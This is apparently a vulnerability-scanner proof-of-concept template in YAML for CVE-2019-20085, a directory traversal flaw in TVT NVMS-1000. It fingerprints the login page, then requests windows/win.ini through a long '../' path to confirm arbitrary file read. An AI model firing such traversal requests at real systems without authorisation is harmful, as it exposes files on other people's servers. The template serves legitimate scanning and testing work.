name: poc-yaml-tvt-nvms-1000-file-read-cve-2019-20085
manual: true
transport: http
rules:
- method: GET
path: /Pages/login.htm
expression: response.status == 200 && response.body.bcontains(b"
NVMS-1000")
- method: GET
path: /../../../../../../../../../../../../windows/win.ini
expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
detail:
author: fuzz7j(https://github.com/fuzz7j)
links:
- https://www.exploit-db.com/exploits/47774